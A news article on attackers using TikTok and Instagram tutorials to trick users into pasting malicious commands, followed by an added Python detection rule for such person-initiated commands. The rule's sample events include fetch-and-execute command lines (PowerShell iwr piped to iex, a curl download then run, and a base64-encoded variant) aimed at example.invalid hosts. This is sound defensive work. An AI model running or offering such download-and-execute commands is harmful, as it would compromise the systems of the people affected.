Cybercriminals use TikTok Tutorials to Bypass Security Defenses
Cybersecurity organizations have identified a new attack method that uses video tutorials on platforms such as TikTok and Instagram. The tactic instructs users to execute malicious commands directly on their systems, bypassing traditional security detection mechanisms.
The effectiveness of this threat does not lie in the technical complexity of the malware, but in an innovative distribution strategy based on social engineering. “These types of attacks do not send malicious links or attachments. The video itself is harmless, but it instructs the user to perform actions that ultimately compromise their security,” Aaron Rose, Security Architect at Check Point, told Expansión. This method exploits the trust users place in instructional content to compromise their devices.
The evolution of cyberthreats shows a shift from traditional attack vectors, such as email, to high-engagement platforms like social media. This tactic represents a sophisticated form of social engineering, where malicious content is disguised as an opportunity. Attackers produce videos, often using AI tools to simulate legitimate content creators, that offer appealing benefits such as activating free software, accessing premium services, or increasing social media followers.
By instructing users to manually run a command, attackers cause the individual to initiate the infection on their own system. This bypasses perimeter and email defenses designed to detect and block suspicious files or links. The threat is no longer an attachment, but a verbal or textual instruction embedded in audiovisual content that appears harmless.
The impact of this attack method goes beyond the personal sphere and presents a significant risk to the corporate environment. The increasing phenomenon of “bring your own device” (BYOD) and the use of corporate devices for personal tasks blur the lines between private and professional environments. An employee who uses a company device to view these tutorials and executes the suggested commands can become the entry point for an intrusion across the organization’s network.
According to Check Point, Mexico sees over 3,200 weekly attacks targeting organizations — 68% above the global average. Attribution and mitigation of these attacks pose considerable challenges. The privacy policies of platforms such as TikTok, which do not share the IP addresses of content creators, complicate identification of the campaign’s origin. This forces cybersecurity teams to adopt a reactive approach, tracking the malware back to its command and control (C2) center after the infection has occurred.
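The article describes the bypass only in general terms: the user types or pastes a command, so nothing crosses the email or web perimeter. Endpoint process-creation telemetry is where such an infection is still visible. As an added example, not part of the article or of Check Point's material, the Python rule below flags shell commands launched from a user-facing parent process (the desktop or Run dialog) that both fetch remote content and execute it, or that additionally hide the window or pass an encoded command. The event field names, the sample events, and the example.invalid hostnames are constructed for this illustration and correspond to no real telemetry schema or campaign.

```python
"""Detection rule: person-initiated shell commands that fetch and run remote content."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parent processes through which a person typically types or pastes a command
# (desktop / Run dialog via explorer.exe, or a terminal host). Assumed names.
USER_FACING_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Indicator families; each contributes one reason to the finding.
FETCH_RE = re.compile(
    r"\biwr\b|invoke-webrequest|downloadstring|net\.webclient|\bcurl\b|\bwget\b|https?://", re.I)
EXEC_RE = re.compile(r"\biex\b|invoke-expression|start-process|&&", re.I)
OBFUSCATION_RE = re.compile(r"-e(?:nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_ARG_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed sample payload and events (hypothetical EDR-style fields, not real telemetry).
ENCODED_PAYLOAD = "iwr http://example.invalid/p.ps1 | iex"
ENCODED_B64 = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/a.ps1 | iex"'},
    {"user": "jdoe", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd /c curl -s http://example.invalid/x.bat -o x.bat && x.bat"},
    {"user": "SYSTEM", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users\\jdoe\\Documents"},
    {"user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -EncodedCommand " + ENCODED_B64},
    {"user": "jdoe", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest https://example.invalid/report.csv -OutFile r.csv"'},
]


@dataclass
class Finding:
    user: str
    cmdline: str
    reasons: List[str] = field(default_factory=list)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind a -EncodedCommand argument, or '' if absent/undecodable."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def assess(event: dict) -> Optional[Finding]:
    """Flag a shell launched from a user-facing parent when two or more indicator families match."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    if parent not in USER_FACING_PARENTS or image not in SHELLS:
        return None  # not a person-initiated shell; outside this rule's scope
    text = event["cmdline"]
    # Scan the visible command line together with any decoded encoded-command body.
    scan = text + "\n" + decode_encoded_command(text)
    reasons = []
    if FETCH_RE.search(scan):
        reasons.append("fetches remote content")
    if EXEC_RE.search(scan):
        reasons.append("executes fetched content")
    if OBFUSCATION_RE.search(text):
        reasons.append("hidden window or encoded command")
    # A plain download (one indicator) is routine; two families together are the pasted-command pattern.
    return Finding(event["user"], text, reasons) if len(reasons) >= 2 else None


def scan_events(events: List[dict]) -> List[Finding]:
    return [f for f in (assess(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"[{finding.user}] {finding.cmdline!r}: {', '.join(finding.reasons)}")
```

Run on the constructed sample, the rule flags the two plain download-and-run commands and the encoded one, and leaves the service process, the local directory listing, and the plain file download alone. Because the rule keys on the parent process rather than on a file or URL, it still fires when the user typed the command themselves, which is exactly the case the perimeter never sees.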